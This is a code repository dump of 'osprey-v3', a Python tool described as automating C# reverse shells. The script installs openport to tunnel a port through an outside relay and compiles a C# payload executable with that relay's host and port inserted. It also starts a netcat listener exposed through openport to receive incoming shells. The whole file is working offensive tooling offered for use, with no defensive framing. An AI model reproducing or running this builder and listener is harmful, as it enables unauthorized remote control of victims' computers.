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If this is what you want to do, use the GNU Lesser General 339 | Public License instead of this License. 340 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # osprey-v3 2 | fully automated c# reverse shells 3 | networking is also automated 4 | -------------------------------------------------------------------------------- /osprey3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/9-s3c/osprey-v3/20fa299d39e161c61f2aa70fa382f7a0771f5f0a/osprey3 -------------------------------------------------------------------------------- /osprey3.py: -------------------------------------------------------------------------------- 1 | import base64 2 | import subprocess 3 | import datetime 4 | import os 5 | import sys 6 | import random 7 | import time 8 | import threading 9 | 10 | def get_programs(): 11 | try: 12 | print ("\u001b[34msetting up required programs\u001b[0m") 13 | try: 14 | os.mkdir("/etc/osprey/") 15 | except: 16 | pass 17 | try: 18 | os.mkdir("debug") 19 | except: 20 | pass 21 | os.system("sudo apt install mono-mcs -y") 22 | os.system("wget https://openport.io/download/debian64/latest.deb -O /etc/osprey/openport.deb") 23 | os.system("sudo dpkg -i /etc/osprey/openport.deb") 24 | print ("\u001b[32m[OK]\u001b[0m ") 25 | except: 26 | print ("\u001b[31mERROR: exiting...") 27 | sys.exit() 28 | 29 | def openport_startup(): 30 | print ("\u001b[34msetting up networking\u001b[0m") 31 | def c1(): 32 | time.sleep(15) 33 | os.system("pkill openport") 34 | def c2(): 35 | os.system("openport 7823 > out.txt") 36 | 37 | t1 = threading.Thread(target=c1, args=()) 38 | t2 = threading.Thread(target=c2, args=()) 39 | t1.start() 40 | t2.start() 41 | time.sleep(20) 42 | print ("\u001b[32m[OK]\u001b[0m ") 43 | 44 | 45 | def make_usr_config(): 46 | time.sleep(5) 47 | print ("\u001b[34msetting user configuration files\u001b[0m") 48 | for ln in open("out.txt").read().split("\n"): 49 | if "Now forwarding remote port" in ln: 50 | rhost = ln.split()[6].split(":")[0] 51 | rport = ln.split()[6].split(":")[1] 52 | lport = ln.split()[8].split(":")[1].split(".")[0] 53 | elif "Tell the one you are sending this link to, to first go here" in ln: 54 | url = ln.split()[13] 55 | 56 | open("/etc/osprey/url.txt","w").write(url) 57 | open("/etc/osprey/rhost.txt","w").write(rhost) 58 | open("/etc/osprey/rport.txt","w").write(rport) 59 | open("/etc/osprey/lport.txt","w").write(lport) 60 | print ("\u001b[32m[OK]\u001b[0m ") 61 | 62 | def setup(): 63 | print (""" 64 | IT LOOKS LIKE THIS IS YOUR FIRST TIME RUNNING THE LATEST VERSION OF OSPREY 65 | WE NEED TO SET UP A FIEW THINGS 66 | THIS MIGHT TAKE A FIEW MINUTES 67 | """) 68 | get_programs() 69 | openport_startup() 70 | make_usr_config() 71 | print (""" 72 | OK, SO IT LOOKS LIKE THE SETUP WORKED 73 | GO AHEAD AND RUN THE PROGRAM AGAIN AND YOU SOULDNT GET ANYMORE ANOYING MESSAGES 74 | IF YOU HAVE ANY ISSUES MAKE SURE TO LET ME KNOW ON GITHUB, OR JUST MESSAGE ME ON DISCORD: 9sec#7640 75 | """) 76 | sys.exit() 77 | 78 | 79 | 80 | def build(OUT,HOST,PORT,URL): 81 | pld_sect1 = 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85 | pld = (pld_sect1 + HOST + pld_sect2 + PORT + pld_sect3 + URL + pld_sect4) 86 | try: 87 | os.mkdir("bld") 88 | except: 89 | pass 90 | try: 91 | os.mkdir("debug") 92 | except: 93 | pass 94 | o = open("bld/out.cs","w+") 95 | o.write(pld) 96 | o.close() 97 | os.system("mcs bld/out.cs") 98 | now = datetime.datetime.now() 99 | os.system("cp bld/out.cs debug/{}_{}_{}_{}_{}.cs".format(now.year, now.month, now.day, now.hour, now.minute)) 100 | os.system("cp bld/out.exe {}".format(OUT)) 101 | os.system("rm -r bld") 102 | 103 | def server(PORT): 104 | def c1(): 105 | time.sleep(15) 106 | os.system(f"nc -lvvp {PORT}") 107 | def c2(): 108 | os.system(f"openport {PORT}") 109 | 110 | t1 = threading.Thread(target=c1, args=()) 111 | t2 = threading.Thread(target=c2, args=()) 112 | t1.start() 113 | t2.start() 114 | 115 | def cfg(): 116 | if os.path.exists("/etc/osprey/"): 117 | now = datetime.datetime.now() 118 | print ("\u001b[32m[FOUND A CONFIGURATION DIRECTORY]\u001b[0m ") 119 | time.sleep(5) 120 | else: 121 | setup() 122 | 123 | def main(): 124 | os.system("clear") 125 | cfg() 126 | print(""" 127 | _____ 128 | |____ | 129 | ___ ___ _ __ _ __ ___ _ _ / / 130 | / _ \/ __| '_ \| '__/ _ \ | | | \ \ 131 | | (_) \__ \ |_) | | | __/ |_| | .___/ / 132 | \___/|___/ .__/|_| \___|\__, | \____/ 133 | | | __/ | 134 | |_| |___/ 135 | https://github.com/9-s3c/osprey-v3/ 136 | """) 137 | f1 = open("/etc/osprey/rhost.txt","r") 138 | rhost = f1.read().rstrip() 139 | f1.close() 140 | f2 = open("/etc/osprey/rport.txt","r") 141 | rport = f2.read().rstrip() 142 | f2.close() 143 | f3 = open("/etc/osprey/lport.txt","r") 144 | lport = f3.read().rstrip() 145 | f3.close() 146 | url = open("/etc/osprey/url.txt","r").read().rstrip() 147 | chs = input("\n\n\nosprey debug, 3.0\n\nBuild\t\t[B]\nListener\t[L]\nSetup\t\t[S]\n\noption: ") 148 | if chs.lower() == "b": 149 | build(input("payload_name(example.exe): "),rhost,rport,url) 150 | else: 151 | server(lport) 152 | 153 | main() 154 | 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